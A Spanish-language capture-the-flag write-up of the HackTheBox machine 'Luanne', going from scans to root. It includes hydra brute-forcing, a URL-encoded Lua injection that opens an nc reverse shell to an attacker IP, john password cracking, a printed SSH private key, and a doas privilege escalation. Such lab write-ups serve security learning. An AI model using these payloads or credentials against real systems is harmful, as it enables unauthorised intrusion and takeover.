Welcome to the Luanne writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Luanne
tags: HTB
Easy
Linux
Platform: Hackthebox
Difficult: Easy
S.O.: Linux
Link: Click here
Enumeración
Nmap
kali@kali:$ sudo nmap -sS -p- -T5 -n --open 10.129.45.136 -oN AllPorts.txt
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-30 16:05 EST
Nmap scan report for 10.129.45.136
Host is up (0.044s latency).
Not shown: 62334 filtered ports, 3198 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9001/tcp open tor-orport
Nmap done: 1 IP address (1 host up) scanned in 32.08 seconds
kali@kali:$ sudo nmap -sC -sV -p22,80,9001 -n -T5 10.129.45.136 -oN PortsInDepth.txt
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey:
| 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
| 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_ 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp open http nginx 1.19.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=.
| http-robots.txt: 1 disallowed entry
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd
Port 9001
Port 80
También necesitas contraseña.
Sin embargo, te permite acceder al fichero robots.txt http://10.129.45.136/robots.txt
User-agent: *
Disallow: /weather #returning 404 but still harvesting cities
Usando dirbuster aparecen los siguientes directorios
kali@kali:$ gobuster dir -t 20 -u http://10.129.45.136/weather/ -w /u
sr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.129.45.136/weather/
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/11/30 18:02:37 Starting gobuster
===============================================================
/forecast (Status: 200)
===============================================================
2020/11/30 18:22:58 Finished
===============================================================
Sending random characters appears the following error.
http://10.129.45.136/weather/forecast?city=list
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Luanne$ hydra -I -l user -P /usr/share/wordlists/rockyou.txt -s 9001 -f 10.129.45.136 http-get /
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-30 19:00:50
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://10.129.45.136:9001/
[9001][http-get] host: 10.129.45.136 login: user password: 123
[STATUS] attack finished for 10.129.45.136 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-30 19:01:35
Exploit
Modificar la Ip y puerto
http://luanne.htb/weather/forecast?city=London%27%29%3Bos.execute%28%22rm%20%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.XX.XX%20PUERTO%20%3E%2Ftmp%2Ff%22%29--
$ ls -la
total 20
drwxr-xr-x 2 root wheel 512 Nov 25 11:27 .
drwxr-xr-x 24 root wheel 512 Nov 24 09:55 ..
-rw-r--r-- 1 root wheel 47 Sep 16 15:07 .htpasswd
-rw-r--r-- 1 root wheel 386 Sep 17 20:56 index.html
-rw-r--r-- 1 root wheel 78 Nov 25 11:38 robots.txt
$ cat .htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
utlizando hashid obtengo el siguiente tipo
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Luanne$ hashid htpasswd
--File 'htpasswd'--
Analyzing '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0'
[+] MD5 Crypt
[+] Cisco-IOS(MD5)
[+] FreeBSD MD5
Utilizando john la saca en un momento
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Luanne$ john htpasswd -w=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iamthebest (?)
1g 0:00:00:00 DONE (2020-12-01 16:11) 9.090g/s 27490p/s 27490c/s 27490C/s secrets..iamcool
Use the "--show" option to display all of the cracked passwords reliably
Session completed
La credencial resultante sería
webapi_user:iamthebest
Solo existe un usuario.
total 1.5K
drwxr-xr-x 3 root wheel 512B Sep 14 06:46 .
drwxr-xr-x 21 root wheel 512B Sep 16 22:05 ..
dr-xr-x--- 7 r.michaels users 512B Sep 16 18:20 r.michaels
En la web http://luanne.htb:9001/logtail/processes
El usuario y la contraseña son:
user:123
Encontramos los procesos que se estan ejecutando:
USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND
root 0 0.0 0.1 0 6136 ? DKl 9:29PM 0:02.54 [system]
root 1 0.0 0.0 19852 1520 ? Ss 9:29PM 0:01.51 init
root 163 0.0 0.0 32508 2324 ? Ss 9:29PM 0:34.35 /usr/sbin/syslogd -s
r.michaels 185 0.0 0.0 34992 1976 ? Is 9:30PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -U r.michaels -b /home/r.michaels/devel/www
root 298 0.0 0.0 20140 1332 ? Is 9:29PM 0:00.00 /usr/sbin/powerd
root 299 0.0 0.0 33424 1836 ? Is 9:30PM 0:00.00 nginx: master process /usr/pkg/sbin/nginx
_httpd 336 0.0 0.3 119324 17232 ? Ss 9:30PM 0:02.24 /usr/pkg/bin/python3.8 /usr/pkg/bin/supervisord-3.8
root 348 0.0 0.0 71348 2972 ? Ss 9:30PM 0:25.50 /usr/sbin/sshd
nginx 373 0.0 0.1 33932 3364 ? I 9:30PM 0:07.82 nginx: worker process
_httpd 376 0.0 0.0 34952 2012 ? Is 9:30PM 0:01.90 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/local/webapi/weather.lua -U _httpd -b /var/www
root 402 0.0 0.0 20216 1656 ? Ss 9:30PM 0:00.02 /usr/sbin/cron
_httpd 12176 0.0 0.0 17596 1128 ? O 11:01PM 0:00.00 /usr/bin/egrep ^USER| \\[system\\] *$| init *$| /usr/sbin/sshd *$| /usr/sbin/syslogd -s *$| /usr/pkg/bin/python3.8 /usr/pkg/bin/supervisord-3.8 *$| /usr/sbin/cron *$| /usr/sbin/powerd *$| /usr/libexec/httpd -u -X -s.*$|^root.* login *$| /usr/libexec/getty Pc ttyE.*$| nginx.*process.*$
_httpd 29239 0.0 0.0 35252 2320 ? I 10:12PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/local/webapi/weather.lua -U _httpd -b /var/www
_httpd 29841 0.0 0.0 35252 2320 ? I 10:55PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3000 -L weather /usr/local/webapi/weather.lua -U _httpd -b /var/www
root 421 0.0 0.0 21652 1580 ttyE1 Is+ 9:30PM 0:00.00 /usr/libexec/getty Pc ttyE1
root 388 0.0 0.0 19780 1584 ttyE2 Is+ 9:30PM 0:00.00 /usr/libexec/getty Pc ttyE2
root 433 0.0 0.0 19780 1580 ttyE3 Is+ 9:30PM 0:00.00 /usr/libexec/getty Pc ttyE3
Entre ellos encontramos un nuevo proceso web ejecutado r.michaels.
r.michaels 185 0.0 0.0 34992 1976 ? Is 9:30PM 0:00.00 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -U r.michaels -b /home/r.michaels/devel/www
Aquí esta la web que hace referencia a https://man.netbsd.org/httpd.8
El parámetro -u "Causes bozohttpd to switch to the user and the groups of username after. This option, like -t above,causes bozohttpd to clear the environment unless the -e option is given." por lo que tendremos acceso a la carpeta de r.michael.
curl -i -u webapi_user:iamthebest http://localhost:3001/~r.michaels/
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 601 0 601 0 0 293k 0 --:--:-- --:--:-- --:--:-- 293k
HTTP/1.1 200 OK
Date: Fri, 04 Dec 2020 15:27:19 GMT
Server: bozohttpd/20190228
Accept-Ranges: bytes
Content-Type: text/html
Connection: close
<!DOCTYPE html>
<html><head><meta charset="utf-8"/>
<style type="text/css">
table {
border-top: 1px solid black;
border-bottom: 1px solid black;
}
th { background: aquamarine; }
tr:nth-child(even) { background: lavender; }
</style>
<title>Index of ~r.michaels/</title></head>
<body><h1>Index of ~r.michaels/</h1>
<table cols=3>
<thead>
<tr><th>Name<th>Last modified<th align=right>Size
<tbody>
<tr><td><a href="../">Parent Directory</a><td>16-Sep-2020 18:20<td align=right>1kB
<tr><td><a href="id_rsa">id_rsa</a><td>16-Sep-2020 16:52<td align=right>3kB
</table>
</body></html>
Existe una clave id_rsa en el directorio (La de michael)
curl -i -u webapi_user:iamthebest http://localhost:3001/~r.michaels/id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2610 100 2610 0 0 849k 0 --:--:-- --:--:-- --:--:-- 849k
HTTP/1.1 200 OK
Date: Fri, 04 Dec 2020 15:27:39 GMT
Server: bozohttpd/20190228
Accept-Ranges: bytes
Last-Modified: Wed, 16 Sep 2020 16:52:06 GMT
Content-Type: text/plain
Content-Length: 2610
Connection: close
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
Privilege Escalation
Dentro del directorio home del usuario encontramos otro directorio llamado backups, y dentro devel_backup-2020-09-16.tar.gz.enc
el cual está encriptado usando pgp. Si listo los binarios disponibles en el sistema, encuentro que está disponible /usr/bin/netpgp el cual podemos usar para desencriptar le archivo usando lo siguiente.
$ netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output /tmp/devel_backup-2020-09-16.tar.gz
Dentro de la carpeta se encuentra otro fichero .htpasswd con otra contraseña diferente.
# john -w=/usr/share/wordlists/rockyou.txt .htpasswd
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
littlebear (webapi_user)
1g 0:00:00:00 DONE (2020-12-04 16:53) 4.166g/s 54400p/s 54400c/s 54400C/s gamboa..hello11
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Por lo que veo, no podemos hacer ni su ni sudo al ser NetBSD.
luanne$ su toor
su: You are not listed in the correct secondary group (wheel) to su toor.
su: Sorry: Authentication error
Voy a listar los SUID.
luanne$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/at
/usr/bin/atq
/usr/bin/atrm
/usr/bin/batch
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/lock
/usr/bin/login
/usr/bin/lpq
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/rlogin
/usr/bin/skeyinfo
/usr/bin/skeyinit
/usr/bin/su
/usr/bin/yppasswd
/usr/libexec/mail.local
/usr/libexec/ssh-keysign
/usr/libexec/utmp_update
/usr/sbin/authpf
/usr/sbin/mrinfo
/usr/sbin/mtrace
/usr/sbin/pppd
/usr/sbin/sliplogin
/usr/sbin/traceroute
/usr/sbin/traceroute6
/usr/pkg/bin/doas
/usr/pkg/libexec/dbus-daemon-launch-helper
/bin/rcmd
/sbin/ping
/sbin/ping6
/sbin/shutdown
Creo que podemos usar /usr/pkg/bin/doas
para ello ya que tiene la misma funcionalidad que su
luanne$ doas -u toor /bin/sh
Password:
# id
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)
#
Y ya somos root.